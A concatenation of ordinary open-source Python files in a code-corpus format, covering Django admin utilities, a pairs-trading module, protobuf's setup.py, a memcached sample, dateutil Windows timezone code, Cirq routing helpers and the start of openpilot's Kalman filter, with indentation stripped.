def model_format_dict(obj):
"""
Return a `dict` with keys 'verbose_name' and 'verbose_name_plural',
typically for use with string formatting.
`obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
"""
if isinstance(obj, (models.Model, models.base.ModelBase)):
opts = obj._meta
elif isinstance(obj, models.query.QuerySet):
opts = obj.model._meta
else:
opts = obj
return {
'verbose_name': force_text(opts.verbose_name),
'verbose_name_plural': force_text(opts.verbose_name_plural)
}
def model_ngettext(obj, n=None):
"""
Return the appropriate `verbose_name` or `verbose_name_plural` value for
`obj` depending on the count `n`.
`obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
If `obj` is a `QuerySet` instance, `n` is optional and the length of the
`QuerySet` is used.
"""
if isinstance(obj, models.query.QuerySet):
if n is None:
n = obj.count()
obj = obj.model
d = model_format_dict(obj)
singular, plural = d["verbose_name"], d["verbose_name_plural"]
return ungettext(singular, plural, n or 0)
def lookup_field(name, obj, model_admin=None):
opts = obj._meta
try:
f = _get_non_gfk_field(opts, name)
except FieldDoesNotExist:
# For non-field values, the value is either a method, property or
# returned via a callable.
if callable(name):
attr = name
value = attr(obj)
elif (model_admin is not None and
hasattr(model_admin, name) and
not name == '__str__' and
not name == '__unicode__'):
attr = getattr(model_admin, name)
value = attr(obj)
else:
attr = getattr(obj, name)
if callable(attr):
value = attr()
else:
value = attr
f = None
else:
attr = None
value = getattr(obj, name)
return f, attr, value
def _get_non_gfk_field(opts, name):
"""
For historical reasons, the admin app relies on GenericForeignKeys as being
"not found" by get_field(). This could likely be cleaned up.
"""
field = opts.get_field(name)
if field.is_relation and field.many_to_one and not field.related_model:
raise FieldDoesNotExist()
return field
def label_for_field(name, model, model_admin=None, return_attr=False):
"""
Returns a sensible label for a field name. The name can be a callable,
property (but not created with @property decorator) or the name of an
object's attribute, as well as a genuine fields. If return_attr is
True, the resolved attribute (which could be a callable) is also returned.
This will be None if (and only if) the name refers to a field.
"""
attr = None
try:
field = _get_non_gfk_field(model._meta, name)
try:
label = field.verbose_name
except AttributeError:
# field is likely a ForeignObjectRel
label = field.related_model._meta.verbose_name
except FieldDoesNotExist:
if name == "__unicode__":
label = force_text(model._meta.verbose_name)
attr = six.text_type
elif name == "__str__":
label = force_str(model._meta.verbose_name)
attr = bytes
else:
if callable(name):
attr = name
elif model_admin is not None and hasattr(model_admin, name):
attr = getattr(model_admin, name)
elif hasattr(model, name):
attr = getattr(model, name)
else:
message = "Unable to lookup '%s' on %s" % (name, model._meta.object_name)
if model_admin:
message += " or %s" % (model_admin.__class__.__name__,)
raise AttributeError(message)
if hasattr(attr, "short_description"):
label = attr.short_description
elif (isinstance(attr, property) and
hasattr(attr, "fget") and
hasattr(attr.fget, "short_description")):
label = attr.fget.short_description
elif callable(attr):
if attr.__name__ == "<lambda>":
label = "--"
else:
label = pretty_name(attr.__name__)
else:
label = pretty_name(name)
if return_attr:
return (label, attr)
else:
return label
def help_text_for_field(name, model):
help_text = ""
try:
field = _get_non_gfk_field(model._meta, name)
except FieldDoesNotExist:
pass
else:
if hasattr(field, 'help_text'):
help_text = field.help_text
return smart_text(help_text)
def display_for_field(value, field, empty_value_display):
from django.contrib.admin.templatetags.admin_list import _boolean_icon
if field.flatchoices:
return dict(field.flatchoices).get(value, empty_value_display)
# NullBooleanField needs special-case null-handling, so it comes
# before the general null test.
elif isinstance(field, models.BooleanField) or isinstance(field, models.NullBooleanField):
return _boolean_icon(value)
elif value is None:
return empty_value_display
elif isinstance(field, models.DateTimeField):
return formats.localize(timezone.template_localtime(value))
elif isinstance(field, (models.DateField, models.TimeField)):
return formats.localize(value)
elif isinstance(field, models.DecimalField):
return formats.number_format(value, field.decimal_places)
elif isinstance(field, (models.IntegerField, models.FloatField)):
return formats.number_format(value)
elif isinstance(field, models.FileField) and value:
return format_html('<a href="{}">{}</a>', value.url, value)
else:
return smart_text(value)
def display_for_value(value, empty_value_display, boolean=False):
from django.contrib.admin.templatetags.admin_list import _boolean_icon
if boolean:
return _boolean_icon(value)
elif value is None:
return empty_value_display
elif isinstance(value, datetime.datetime):
return formats.localize(timezone.template_localtime(value))
elif isinstance(value, (datetime.date, datetime.time)):
return formats.localize(value)
elif isinstance(value, six.integer_types + (decimal.Decimal, float)):
return formats.number_format(value)
else:
return smart_text(value)
class NotRelationField(Exception):
pass
def get_model_from_relation(field):
if hasattr(field, 'get_path_info'):
return field.get_path_info()[-1].to_opts.model
else:
raise NotRelationField
def reverse_field_path(model, path):
""" Create a reversed field path.
E.g. Given (Order, "user__groups"),
return (Group, "user__order").
Final field must be a related model, not a data field.
"""
reversed_path = []
parent = model
pieces = path.split(LOOKUP_SEP)
for piece in pieces:
field = parent._meta.get_field(piece)
# skip trailing data field if extant:
if len(reversed_path) == len(pieces) - 1: # final iteration
try:
get_model_from_relation(field)
except NotRelationField:
break
# Field should point to another model
if field.is_relation and not (field.auto_created and not field.concrete):
related_name = field.related_query_name()
parent = field.remote_field.model
else:
related_name = field.field.name
parent = field.related_model
reversed_path.insert(0, related_name)
return (parent, LOOKUP_SEP.join(reversed_path))
def get_fields_from_path(model, path):
""" Return list of Fields given path relative to model.
e.g. (ModelX, "user__groups__name") -> [
<django.db.models.fields.related.ForeignKey object at 0x...>,
<django.db.models.fields.related.ManyToManyField object at 0x...>,
<django.db.models.fields.CharField object at 0x...>,
]
"""
pieces = path.split(LOOKUP_SEP)
fields = []
for piece in pieces:
if fields:
parent = get_model_from_relation(fields[-1])
else:
parent = model
fields.append(parent._meta.get_field(piece))
return fields
def remove_trailing_data_field(fields):
""" Discard trailing non-relation field if extant. """
try:
get_model_from_relation(fields[-1])
except NotRelationField:
fields = fields[:-1]
return fields
| bsd-3-clause |
atpaino/stocktradinganalysis | pairstrading/classificationfns.py | 1 | 3642 | #Contains functions used to classify a proposed trade consisting of two HistoricData
#objects at a specific time as either successful (reverted to mean) or unsuccessful.
from singleseriesfns import *
from twoseriesfns import *
def bounded_roi(hd1, hd2, n=20, offset=20):
"""
Calculates the average, bounded ROI for the proposed trade (assuming the symbol
with the larger percent gain over offset+n:offset has been shorted).
NOTE: offset must be greater than or equal to n
"""
#Calculate percent gain in hd1 and hd2 to determine which would be shorted
pg1 = (hd1.close[offset] - hd1.close[offset+n]) / hd1.close[offset+n]
pg2 = (hd2.close[offset] - hd2.close[offset+n]) / hd2.close[offset+n]
if pg1 > pg2:
short = hd1
long = hd2
else:
short = hd2
long = hd1
#Calculate ROI for shorted symbol
roi_short = (short.close[offset] - short.close[offset-n]) / short.close[offset]
#Calculate ROI for long symbol
roi_long = (long.close[offset-n] - long.close[offset]) / long.close[offset]
#Return the average of these ROI's, multiplied by 10 and bounded by tanh
return sp.tanh(5 * (roi_short+roi_long))
def winning_trade_test(hd1, hd2, n=20, offset=20):
"""
Alternative to bounded_roi for determing class of trade.
Returns 1 iff the shorted position decreased AND the long position increased.
"""
#Calculate percent gain in hd1 and hd2 to determine which would be shorted
pg1 = (hd1.close[offset] - hd1.close[offset+n]) / hd1.close[offset+n]
pg2 = (hd2.close[offset] - hd2.close[offset+n]) / hd2.close[offset+n]
if pg1 > pg2:
short = hd1
long = hd2
else:
short = hd2
long = hd1
return 1 if ( short.close[offset] > short.close[offset-n] ) and ( long.close[offset-n] > long.close[offset] ) else 0
def mean_reversion_test(hd1, hd2, n=20, offset=20, hold_time=30, return_index=False):
"""
Tests over the time period offset:offset-n to see if the pair reverts to the mean.
Specifically, we are doing this by testing at each closing price in this time period
to see if the long position is higher than its sma at the same time the short position
is below its sma.
"""
#Get short and long positions
(short_pos, long_pos) = get_short_long(hd1, hd2, n, offset)
#Calculate the simple moving average for each stock at time offset
short_sma = sma(short_pos, offset=offset)
long_sma = sma(long_pos, offset=offset)
for i in xrange(offset, max(offset-hold_time, 0), -1):
if short_pos.close[i] < short_sma and long_pos.close[i] > long_sma:
if return_index:
return i
return 1
#The pair has not reverted to the mean
if return_index:
return i
return 0
def mean_ratio_reversion_test(hd1, hd2, n=20, offset=20, hold_time=30, return_index=False):
"""
Tests over the time period offset:offset-hold_time to see if the price ratio of the
price pair reverts to the mean.
"""
#Get initial price ratio
init_pr = hd1.close[offset]/hd2.close[offset]
#Get mean for the pair
pr_mean = mean_price_ratio(hd1, hd2, n=n, offset=offset)
#Calculate coefficient to use to see if the price ratio switched sides of mean pr
coeff = 1 if init_pr > pr_mean else -1
for i in xrange(offset, max(offset-hold_time, 0), -1):
if coeff*(hd1.close[i]/hd2.close[offset] - pr_mean) < 0:
if return_index:
return i
return 1
#The pair has not reverted to the mean
if return_index:
return i
return 0
| mit |
JCROM-Android/jcrom_external_chromium_org | third_party/protobuf/python/setup.py | 23 | 7723 | #! /usr/bin/python
#
# See README for usage instructions.
import sys
import os
import subprocess
# We must use setuptools, not distutils, because we need to use the
# namespace_packages option for the "google" package.
try:
from setuptools import setup, Extension
except ImportError:
try:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, Extension
except ImportError:
sys.stderr.write(
"Could not import setuptools; make sure you have setuptools or "
"ez_setup installed.\n")
raise
from distutils.command.clean import clean as _clean
from distutils.command.build_py import build_py as _build_py
from distutils.spawn import find_executable
maintainer_email = "protobuf@googlegroups.com"
# Find the Protocol Compiler.
if os.path.exists("../src/protoc"):
protoc = "../src/protoc"
elif os.path.exists("../src/protoc.exe"):
protoc = "../src/protoc.exe"
elif os.path.exists("../vsprojects/Debug/protoc.exe"):
protoc = "../vsprojects/Debug/protoc.exe"
elif os.path.exists("../vsprojects/Release/protoc.exe"):
protoc = "../vsprojects/Release/protoc.exe"
else:
protoc = find_executable("protoc")
def generate_proto(source):
"""Invokes the Protocol Compiler to generate a _pb2.py from the given
.proto file. Does nothing if the output already exists and is newer than
the input."""
output = source.replace(".proto", "_pb2.py").replace("../src/", "")
if (not os.path.exists(output) or
(os.path.exists(source) and
os.path.getmtime(source) > os.path.getmtime(output))):
print "Generating %s..." % output
if not os.path.exists(source):
sys.stderr.write("Can't find required file: %s\n" % source)
sys.exit(-1)
if protoc == None:
sys.stderr.write(
"protoc is not installed nor found in ../src. Please compile it "
"or install the binary package.\n")
sys.exit(-1)
protoc_command = [ protoc, "-I../src", "-I.", "--python_out=.", source ]
if subprocess.call(protoc_command) != 0:
sys.exit(-1)
def GenerateUnittestProtos():
generate_proto("../src/google/protobuf/unittest.proto")
generate_proto("../src/google/protobuf/unittest_custom_options.proto")
generate_proto("../src/google/protobuf/unittest_import.proto")
generate_proto("../src/google/protobuf/unittest_import_public.proto")
generate_proto("../src/google/protobuf/unittest_mset.proto")
generate_proto("../src/google/protobuf/unittest_no_generic_services.proto")
generate_proto("google/protobuf/internal/test_bad_identifiers.proto")
generate_proto("google/protobuf/internal/more_extensions.proto")
generate_proto("google/protobuf/internal/more_extensions_dynamic.proto")
generate_proto("google/protobuf/internal/more_messages.proto")
generate_proto("google/protobuf/internal/factory_test1.proto")
generate_proto("google/protobuf/internal/factory_test2.proto")
def MakeTestSuite():
# This is apparently needed on some systems to make sure that the tests
# work even if a previous version is already installed.
if 'google' in sys.modules:
del sys.modules['google']
GenerateUnittestProtos()
import unittest
import google.protobuf.internal.generator_test as generator_test
import google.protobuf.internal.descriptor_test as descriptor_test
import google.protobuf.internal.reflection_test as reflection_test
import google.protobuf.internal.service_reflection_test \
as service_reflection_test
import google.protobuf.internal.text_format_test as text_format_test
import google.protobuf.internal.wire_format_test as wire_format_test
import google.protobuf.internal.unknown_fields_test as unknown_fields_test
import google.protobuf.internal.descriptor_database_test \
as descriptor_database_test
import google.protobuf.internal.descriptor_pool_test as descriptor_pool_test
import google.protobuf.internal.message_factory_test as message_factory_test
import google.protobuf.internal.message_cpp_test as message_cpp_test
import google.protobuf.internal.reflection_cpp_generated_test \
as reflection_cpp_generated_test
loader = unittest.defaultTestLoader
suite = unittest.TestSuite()
for test in [ generator_test,
descriptor_test,
reflection_test,
service_reflection_test,
text_format_test,
wire_format_test ]:
suite.addTest(loader.loadTestsFromModule(test))
return suite
class clean(_clean):
def run(self):
# Delete generated files in the code tree.
for (dirpath, dirnames, filenames) in os.walk("."):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
if filepath.endswith("_pb2.py") or filepath.endswith(".pyc") or \
filepath.endswith(".so") or filepath.endswith(".o") or \
filepath.endswith('google/protobuf/compiler/__init__.py'):
os.remove(filepath)
# _clean is an old-style class, so super() doesn't work.
_clean.run(self)
class build_py(_build_py):
def run(self):
# Generate necessary .proto file if it doesn't exist.
generate_proto("../src/google/protobuf/descriptor.proto")
generate_proto("../src/google/protobuf/compiler/plugin.proto")
GenerateUnittestProtos()
# Make sure google.protobuf.compiler is a valid package.
open('google/protobuf/compiler/__init__.py', 'a').close()
# _build_py is an old-style class, so super() doesn't work.
_build_py.run(self)
if __name__ == '__main__':
ext_module_list = []
# C++ implementation extension
if os.getenv("PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION", "python") == "cpp":
print "Using EXPERIMENTAL C++ Implmenetation."
ext_module_list.append(Extension(
"google.protobuf.internal._net_proto2___python",
[ "google/protobuf/pyext/python_descriptor.cc",
"google/protobuf/pyext/python_protobuf.cc",
"google/protobuf/pyext/python-proto2.cc" ],
include_dirs = [ "." ],
libraries = [ "protobuf" ]))
setup(name = 'protobuf',
version = '2.4.2-pre',
packages = [ 'google' ],
namespace_packages = [ 'google' ],
test_suite = 'setup.MakeTestSuite',
# Must list modules explicitly so that we don't install tests.
py_modules = [
'google.protobuf.internal.api_implementation',
'google.protobuf.internal.containers',
'google.protobuf.internal.cpp_message',
'google.protobuf.internal.decoder',
'google.protobuf.internal.encoder',
'google.protobuf.internal.message_listener',
'google.protobuf.internal.python_message',
'google.protobuf.internal.type_checkers',
'google.protobuf.internal.wire_format',
'google.protobuf.descriptor',
'google.protobuf.descriptor_pb2',
'google.protobuf.compiler.plugin_pb2',
'google.protobuf.message',
'google.protobuf.descriptor_database',
'google.protobuf.descriptor_pool',
'google.protobuf.message_factory',
'google.protobuf.reflection',
'google.protobuf.service',
'google.protobuf.service_reflection',
'google.protobuf.text_format' ],
cmdclass = { 'clean': clean, 'build_py': build_py },
install_requires = ['setuptools'],
ext_modules = ext_module_list,
url = 'http://code.google.com/p/protobuf/',
maintainer = maintainer_email,
maintainer_email = 'protobuf@googlegroups.com',
license = 'New BSD License',
description = 'Protocol Buffers',
long_description =
"Protocol Buffers are Google's data interchange format.",
)
| bsd-3-clause |
chenglongwei/trafficserver | plugins/experimental/memcached_remap/sample.py | 1 | 1324 | #!/usr/bin/python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Author: opensource@navyaprabha.com
# Description: Sample script to add keys to memcached for use with YTS/memcached_remap plugin
import memcache
# connect to local server
mc = memcache.Client(['127.0.0.1:11211'], debug=0)
# Add couple of keys
mc.set("http://127.0.0.1:80/", "http://127.0.0.1:8080");
mc.set("http://localhost:80/", "http://localhost:8080");
# Print the keys that are saved
print "response-1 is '%s'" %(mc.get("http://127.0.0.1:80/"))
print "response-2 is '%s'" %(mc.get("http://localhost:80/"))
| apache-2.0 |
sirchia/CouchPotatoServer | libs/dateutil/tzwin.py | 304 | 5828 | # This code was originally contributed by Jeffrey Harris.
import datetime
import struct
import _winreg
__author__ = "Jeffrey Harris & Gustavo Niemeyer <gustavo@niemeyer.net>"
__all__ = ["tzwin", "tzwinlocal"]
ONEWEEK = datetime.timedelta(7)
TZKEYNAMENT = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones"
TZKEYNAME9X = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Time Zones"
TZLOCALKEYNAME = r"SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
def _settzkeyname():
global TZKEYNAME
handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
try:
_winreg.OpenKey(handle, TZKEYNAMENT).Close()
TZKEYNAME = TZKEYNAMENT
except WindowsError:
TZKEYNAME = TZKEYNAME9X
handle.Close()
_settzkeyname()
class tzwinbase(datetime.tzinfo):
"""tzinfo class based on win32's timezones available in the registry."""
def utcoffset(self, dt):
if self._isdst(dt):
return datetime.timedelta(minutes=self._dstoffset)
else:
return datetime.timedelta(minutes=self._stdoffset)
def dst(self, dt):
if self._isdst(dt):
minutes = self._dstoffset - self._stdoffset
return datetime.timedelta(minutes=minutes)
else:
return datetime.timedelta(0)
def tzname(self, dt):
if self._isdst(dt):
return self._dstname
else:
return self._stdname
def list():
"""Return a list of all time zones known to the system."""
handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
tzkey = _winreg.OpenKey(handle, TZKEYNAME)
result = [_winreg.EnumKey(tzkey, i)
for i in range(_winreg.QueryInfoKey(tzkey)[0])]
tzkey.Close()
handle.Close()
return result
list = staticmethod(list)
def display(self):
return self._display
def _isdst(self, dt):
dston = picknthweekday(dt.year, self._dstmonth, self._dstdayofweek,
self._dsthour, self._dstminute,
self._dstweeknumber)
dstoff = picknthweekday(dt.year, self._stdmonth, self._stddayofweek,
self._stdhour, self._stdminute,
self._stdweeknumber)
if dston < dstoff:
return dston <= dt.replace(tzinfo=None) < dstoff
else:
return not dstoff <= dt.replace(tzinfo=None) < dston
class tzwin(tzwinbase):
def __init__(self, name):
self._name = name
handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
tzkey = _winreg.OpenKey(handle, "%s\%s" % (TZKEYNAME, name))
keydict = valuestodict(tzkey)
tzkey.Close()
handle.Close()
self._stdname = keydict["Std"].encode("iso-8859-1")
self._dstname = keydict["Dlt"].encode("iso-8859-1")
self._display = keydict["Display"]
# See http://ww_winreg.jsiinc.com/SUBA/tip0300/rh0398.htm
tup = struct.unpack("=3l16h", keydict["TZI"])
self._stdoffset = -tup[0]-tup[1] # Bias + StandardBias * -1
self._dstoffset = self._stdoffset-tup[2] # + DaylightBias * -1
(self._stdmonth,
self._stddayofweek, # Sunday = 0
self._stdweeknumber, # Last = 5
self._stdhour,
self._stdminute) = tup[4:9]
(self._dstmonth,
self._dstdayofweek, # Sunday = 0
self._dstweeknumber, # Last = 5
self._dsthour,
self._dstminute) = tup[12:17]
def __repr__(self):
return "tzwin(%s)" % repr(self._name)
def __reduce__(self):
return (self.__class__, (self._name,))
class tzwinlocal(tzwinbase):
def __init__(self):
handle = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
tzlocalkey = _winreg.OpenKey(handle, TZLOCALKEYNAME)
keydict = valuestodict(tzlocalkey)
tzlocalkey.Close()
self._stdname = keydict["StandardName"].encode("iso-8859-1")
self._dstname = keydict["DaylightName"].encode("iso-8859-1")
try:
tzkey = _winreg.OpenKey(handle, "%s\%s"%(TZKEYNAME, self._stdname))
_keydict = valuestodict(tzkey)
self._display = _keydict["Display"]
tzkey.Close()
except OSError:
self._display = None
handle.Close()
self._stdoffset = -keydict["Bias"]-keydict["StandardBias"]
self._dstoffset = self._stdoffset-keydict["DaylightBias"]
# See http://ww_winreg.jsiinc.com/SUBA/tip0300/rh0398.htm
tup = struct.unpack("=8h", keydict["StandardStart"])
(self._stdmonth,
self._stddayofweek, # Sunday = 0
self._stdweeknumber, # Last = 5
self._stdhour,
self._stdminute) = tup[1:6]
tup = struct.unpack("=8h", keydict["DaylightStart"])
(self._dstmonth,
self._dstdayofweek, # Sunday = 0
self._dstweeknumber, # Last = 5
self._dsthour,
self._dstminute) = tup[1:6]
def __reduce__(self):
return (self.__class__, ())
def picknthweekday(year, month, dayofweek, hour, minute, whichweek):
"""dayofweek == 0 means Sunday, whichweek 5 means last instance"""
first = datetime.datetime(year, month, 1, hour, minute)
weekdayone = first.replace(day=((dayofweek-first.isoweekday())%7+1))
for n in xrange(whichweek):
dt = weekdayone+(whichweek-n)*ONEWEEK
if dt.month == month:
return dt
def valuestodict(key):
"""Convert a registry key's values to a dictionary."""
dict = {}
size = _winreg.QueryInfoKey(key)[1]
for i in range(size):
data = _winreg.EnumValue(key, i)
dict[data[0]] = data[1]
return dict
| gpl-3.0 |
quantumlib/Cirq | cirq-core/cirq/contrib/routing/device.py | 1 | 3170 | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
from typing import Iterable, Tuple, Dict, Any
import networkx as nx
import cirq
from cirq._compat import deprecated
@deprecated(deadline="v0.12", fix="use gridqubits_to_graph_device(device.qubits) instead")
def xmon_device_to_graph(device: Any) -> nx.Graph:
"""Gets the graph of an XmonDevice."""
return gridqubits_to_graph_device(device.qubits)
def get_linear_device_graph(n_qubits: int) -> nx.Graph:
"""Gets the graph of a linearly connected device."""
qubits = cirq.LineQubit.range(n_qubits)
edges = [tuple(qubits[i : i + 2]) for i in range(n_qubits - 1)]
return nx.Graph(edges)
def get_grid_device_graph(*args, **kwargs) -> nx.Graph:
"""Gets the graph of a grid of qubits.
See GridQubit.rect for argument details."""
return gridqubits_to_graph_device(cirq.GridQubit.rect(*args, **kwargs))
def gridqubits_to_graph_device(qubits: Iterable[cirq.GridQubit]):
"""Gets the graph of a set of grid qubits."""
return nx.Graph(
pair for pair in itertools.combinations(qubits, 2) if _manhattan_distance(*pair) == 1
)
def _manhattan_distance(qubit1: cirq.GridQubit, qubit2: cirq.GridQubit) -> int:
return abs(qubit1.row - qubit2.row) + abs(qubit1.col - qubit2.col)
def nx_qubit_layout(graph: nx.Graph) -> Dict[cirq.Qid, Tuple[float, float]]:
"""Return a layout for a graph for nodes which are qubits.
This can be used in place of nx.spring_layout or other networkx layouts.
GridQubits are positioned according to their row/col. LineQubits are
positioned in a line.
>>> import cirq.contrib.routing as ccr
>>> import networkx as nx
>>> import matplotlib.pyplot as plt
>>> # Clear plot state to prevent issues with pyplot dimensionality.
>>> plt.clf()
>>> g = ccr.gridqubits_to_graph_device(cirq.GridQubit.rect(4,5))
>>> pos = ccr.nx_qubit_layout(g)
>>> nx.draw_networkx(g, pos=pos)
"""
pos: Dict[cirq.Qid, Tuple[float, float]] = {}
_node_to_i_cache = None
for node in graph.nodes:
if isinstance(node, cirq.GridQubit):
pos[node] = (node.col, -node.row)
elif isinstance(node, cirq.LineQubit):
# Offset to avoid overlap with gridqubits
pos[node] = (node.x, 0.5)
else:
if _node_to_i_cache is None:
_node_to_i_cache = {n: i for i, n in enumerate(sorted(graph.nodes))}
# Position in a line according to sort order
# Offset to avoid overlap with gridqubits
pos[node] = (0.5, _node_to_i_cache[node] + 1)
return pos
| apache-2.0 |
vntarasov/openpilot | selfdrive/locationd/models/live_kf.py | 1 | 12011 | #!/usr/bin/env python3
import sys
import numpy as np
import sympy as sp
from selfdrive.locationd.models.constants import ObservationKind
from rednose.helpers.ekf_sym import EKF_sym, gen_code
from rednose.helpers.sympy_helpers import euler_rotate, quat_matrix_r, quat_rotate
EARTH_GM = 3.986005e14 # m^3/s^2 (gravitational constant * mass of earth)
class States():
ECEF_POS = slice(0, 3) # x, y and z in ECEF in meters
ECEF_ORIENTATION = slice(3, 7) # quat for pose of phone in ecef
ECEF_VELOCITY = slice(7, 10) # ecef velocity in m/s
ANGULAR_VELOCITY = slice(10, 13) # roll, pitch and yaw rates in device frame in radians/s
GYRO_BIAS = slice(13, 16) # roll, pitch and yaw biases
ODO_SCALE = slice(16, 17) # odometer scale
ACCELERATION = slice(17, 20) # Acceleration in device frame in m/s**2
IMU_OFFSET = slice(20, 23) # imu offset angles in radians
# Error-state has different slices because it is an ESKF
ECEF_POS_ERR = slice(0, 3)
ECEF_ORIENTATION_ERR = slice(3, 6) # euler angles for orientation error
ECEF_VELOCITY_ERR = slice(6, 9)
ANGULAR_VELOCITY_ERR = slice(9, 12)
GYRO_BIAS_ERR = slice(12, 15)
ODO_SCALE_ERR = slice(15, 16)
ACCELERATION_ERR = slice(16, 19)
IMU_OFFSET_ERR = slice(19, 22)
class LiveKalman():
name = 'live'
initial_x = np.array([-2.7e6, 4.2e6, 3.8e6,
1, 0, 0, 0,
0, 0, 0,
0, 0, 0,
0, 0, 0,
1,
0, 0, 0,
0, 0, 0])
# state covariance
initial_P_diag = np.array([1e16, 1e16, 1e16,
1e6, 1e6, 1e6,
1e4, 1e4, 1e4,
1**2, 1**2, 1**2,
0.05**2, 0.05**2, 0.05**2,
0.02**2,
1**2, 1**2, 1**2,
(0.01)**2, (0.01)**2, (0.01)**2])
# process noise
Q = np.diag([0.03**2, 0.03**2, 0.03**2,
0.001**2, 0.001*2, 0.001**2,
0.01**2, 0.01**2, 0.01**2,
0.1**2, 0.1**2, 0.1**2,
(0.005 / 100)**2, (0.005 / 100)**2, (0.005 / 100)**2,
(0.02 / 100)**2,
3**2, 3**2, 3**2,
(0.05 / 60)**2, (0.05 / 60)**2, (0.05 / 60)**2])
@staticmethod
def generate_code(generated_dir):
name = LiveKalman.name
dim_state = LiveKalman.initial_x.shape[0]
dim_state_err = LiveKalman.initial_P_diag.shape[0]
state_sym = sp.MatrixSymbol('state', dim_state, 1)
state = sp.Matrix(state_sym)
x, y, z = state[States.ECEF_POS, :]
q = state[States.ECEF_ORIENTATION, :]
v = state[States.ECEF_VELOCITY, :]
vx, vy, vz = v
omega = state[States.ANGULAR_VELOCITY, :]
vroll, vpitch, vyaw = omega
roll_bias, pitch_bias, yaw_bias = state[States.GYRO_BIAS, :]
odo_scale = state[States.ODO_SCALE, :][0, :]
acceleration = state[States.ACCELERATION, :]
imu_angles = state[States.IMU_OFFSET, :]
dt = sp.Symbol('dt')
# calibration and attitude rotation matrices
quat_rot = quat_rotate(*q)
# Got the quat predict equations from here
# A New Quaternion-Based Kalman Filter for
# Real-Time Attitude Estimation Using the Two-Step
# Geometrically-Intuitive Correction Algorithm
A = 0.5 * sp.Matrix([[0, -vroll, -vpitch, -vyaw],
[vroll, 0, vyaw, -vpitch],
[vpitch, -vyaw, 0, vroll],
[vyaw, vpitch, -vroll, 0]])
q_dot = A * q
# Time derivative of the state as a function of state
state_dot = sp.Matrix(np.zeros((dim_state, 1)))
state_dot[States.ECEF_POS, :] = v
state_dot[States.ECEF_ORIENTATION, :] = q_dot
state_dot[States.ECEF_VELOCITY, 0] = quat_rot * acceleration
# Basic descretization, 1st order intergrator
# Can be pretty bad if dt is big
f_sym = state + dt * state_dot
state_err_sym = sp.MatrixSymbol('state_err', dim_state_err, 1)
state_err = sp.Matrix(state_err_sym)
quat_err = state_err[States.ECEF_ORIENTATION_ERR, :]
v_err = state_err[States.ECEF_VELOCITY_ERR, :]
omega_err = state_err[States.ANGULAR_VELOCITY_ERR, :]
acceleration_err = state_err[States.ACCELERATION_ERR, :]
# Time derivative of the state error as a function of state error and state
quat_err_matrix = euler_rotate(quat_err[0], quat_err[1], quat_err[2])
q_err_dot = quat_err_matrix * quat_rot * (omega + omega_err)
state_err_dot = sp.Matrix(np.zeros((dim_state_err, 1)))
state_err_dot[States.ECEF_POS_ERR, :] = v_err
state_err_dot[States.ECEF_ORIENTATION_ERR, :] = q_err_dot
state_err_dot[States.ECEF_VELOCITY_ERR, :] = quat_err_matrix * quat_rot * (acceleration + acceleration_err)
f_err_sym = state_err + dt * state_err_dot
# Observation matrix modifier
H_mod_sym = sp.Matrix(np.zeros((dim_state, dim_state_err)))
H_mod_sym[States.ECEF_POS, States.ECEF_POS_ERR] = np.eye(States.ECEF_POS.stop - States.ECEF_POS.start)
H_mod_sym[States.ECEF_ORIENTATION, States.ECEF_ORIENTATION_ERR] = 0.5 * quat_matrix_r(state[3:7])[:, 1:]
H_mod_sym[States.ECEF_ORIENTATION.stop:, States.ECEF_ORIENTATION_ERR.stop:] = np.eye(dim_state - States.ECEF_ORIENTATION.stop)
# these error functions are defined so that say there
# is a nominal x and true x:
# true x = err_function(nominal x, delta x)
# delta x = inv_err_function(nominal x, true x)
nom_x = sp.MatrixSymbol('nom_x', dim_state, 1)
true_x = sp.MatrixSymbol('true_x', dim_state, 1)
delta_x = sp.MatrixSymbol('delta_x', dim_state_err, 1)
err_function_sym = sp.Matrix(np.zeros((dim_state, 1)))
delta_quat = sp.Matrix(np.ones((4)))
delta_quat[1:, :] = sp.Matrix(0.5 * delta_x[States.ECEF_ORIENTATION_ERR, :])
err_function_sym[States.ECEF_POS, :] = sp.Matrix(nom_x[States.ECEF_POS, :] + delta_x[States.ECEF_POS_ERR, :])
err_function_sym[States.ECEF_ORIENTATION, 0] = quat_matrix_r(nom_x[States.ECEF_ORIENTATION, 0]) * delta_quat
err_function_sym[States.ECEF_ORIENTATION.stop:, :] = sp.Matrix(nom_x[States.ECEF_ORIENTATION.stop:, :] + delta_x[States.ECEF_ORIENTATION_ERR.stop:, :])
inv_err_function_sym = sp.Matrix(np.zeros((dim_state_err, 1)))
inv_err_function_sym[States.ECEF_POS_ERR, 0] = sp.Matrix(-nom_x[States.ECEF_POS, 0] + true_x[States.ECEF_POS, 0])
delta_quat = quat_matrix_r(nom_x[States.ECEF_ORIENTATION, 0]).T * true_x[States.ECEF_ORIENTATION, 0]
